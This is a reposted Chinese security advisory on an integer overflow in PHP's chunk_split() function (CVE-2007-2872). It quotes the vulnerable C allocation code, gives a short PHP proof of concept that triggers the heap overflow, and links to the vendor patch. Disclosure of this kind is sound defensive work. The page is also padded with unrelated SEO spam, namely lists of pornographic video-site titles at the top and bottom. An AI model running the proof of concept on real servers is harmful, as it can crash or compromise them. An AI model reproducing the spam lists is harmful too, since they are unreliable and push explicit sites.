PHP是一種流行的WEB服 " /> 国产精品人人爽人人做,激情小视频网站,黄色短视频免费看

一区二区久久-一区二区三区www-一区二区三区久久-一区二区三区久久精品-麻豆国产一区二区在线观看-麻豆国产视频

PHP5.2下chunk_split()函數(shù)整數(shù)溢出漏洞 分析

受影響系統(tǒng):
php php < 5.2.3
不受影響系統(tǒng):
php php 5.2.3
描述:
--------------------------------------------------------------------------------
BUGTRAQ ID: 24261
CVE(CAN) ID: CVE-2007-2872

php是一種流行的WEB服務(wù)器端編程語(yǔ)言。

php中的chunk_split函數(shù)在處理畸形參數(shù)時(shí)存在整數(shù)溢出漏洞,本地攻擊者可能利用此漏洞提升自己的權(quán)限。

php中chunk_split函數(shù)的1963行試圖為函數(shù)結(jié)果分配充分的內(nèi)存大小,但沒(méi)有執(zhí)行任何檢查便使用了srclen和chunklen參數(shù)塊。如果值的塊和endlen大于65534字節(jié)的話,就會(huì)觸發(fā)整數(shù)溢出,分配錯(cuò)誤的內(nèi)存大小,導(dǎo)致堆溢出。

ext/standard/string.c:

1953 static char *php_chunk_split(char *src, int srclen, char *end,
int endlen, int chunklen, int *destlen)
1954 {
1955 char *dest;
1956 char *p, *q;
1957 int chunks; /* complete chunks! */
1958 int restlen;
1959
1960 chunks = srclen / chunklen;
1961 restlen = srclen - chunks * chunklen; /* srclen % chunklen */
1962
1963 dest = safe_emalloc((srclen + (chunks + 1) * endlen + 1),
sizeof(char), 0);
1964
1965 for (p = src, q = dest; p < (src + srclen - chunklen + 1); ) {
1966 memcpy(q, p, chunklen);
1967 q += chunklen;
1968 memcpy(q, end, endlen);
1969 q += endlen;
1970 p += chunklen;
1971 }

<*來(lái)源:Gerhard Wagner

鏈接:http://marc.info/?l=bugtraq&m=118071054000708&w=2
http://www.php.NET/releases/5_2_3.php
http://secunia.com/advisories/25456/
*>

測(cè)試方法:
--------------------------------------------------------------------------------

警 告

以下程序(方法)可能帶有攻擊性,僅供安全研究與教學(xué)之用。使用者風(fēng)險(xiǎn)自負(fù)!

<?
$a=str_repeat("A", 65535);
$b=1;
$c=str_repeat("A", 65535);
chunk_split($a,$b,$c);
?>

建議:
--------------------------------------------------------------------------------
廠商補(bǔ)丁:

php
---
目前廠商已經(jīng)發(fā)布了升級(jí)補(bǔ)丁以修復(fù)這個(gè)安全問(wèn)題,請(qǐng)到廠商的主頁(yè)下載:

http://www.php.NET/downloads.php#v5

文章來(lái)自: 綠盟科技

php技術(shù)PHP5.2下chunk_split()函數(shù)整數(shù)溢出漏洞 分析,轉(zhuǎn)載需保留來(lái)源!

鄭重聲明:本文版權(quán)歸原作者所有,轉(zhuǎn)載文章僅為傳播更多信息之目的,如作者信息標(biāo)記有誤,請(qǐng)第一時(shí)間聯(lián)系我們修改或刪除,多謝。

主站蜘蛛池模板: 91麻豆精品国产综合久久久 | 欧美性色xo影院永久禁欲 | 888米奇四色极速在线观看 | 伊人干综合网 | 色一情一区二区三区四区 | 国产日韩欧美二区 | 国产成人精品免费2021 | 久久久久激情免费观看 | 成年超爽大片免费视频播放 | 国产一区二区不卡视频 | 亚洲一区二区中文字幕 | 亚洲伦理一区二区三区 | 午夜黄色小视频 | 婷婷黄色网 | 四虎网站在线 | 国产区一区二 | 国产中的精品一区的 | 五月婷婷综合网 | 精品一区二区三区四区五区 | 久久免费精品视频 | 都市激情亚洲综合 | 色老板免费在线观看 | 欧美在线视频网 | 免费永久在线观看污污的网站 | 夜色福利院在线看青草一 | 六月丁香深爱六月综合激情 | 涩涩涩涩涩涩涩涩涩涩 | 三级网站免费播放国语 | 国内外成人在线视频 | 中文字幕日本久久2019 | 国产精品网站在线进入 | 色偷偷网址 | 国产999在线观看 | 91精品国产综合久 | 国产欧美视频综合二区 | 91在线在线啪永久地址 | 亚洲毛片视频 | 欧美特黄高清免费观看的 | 91精品国产乱码久久久久久 | 黄视频在线观看免费 | 久久久久久久久女黄9999 |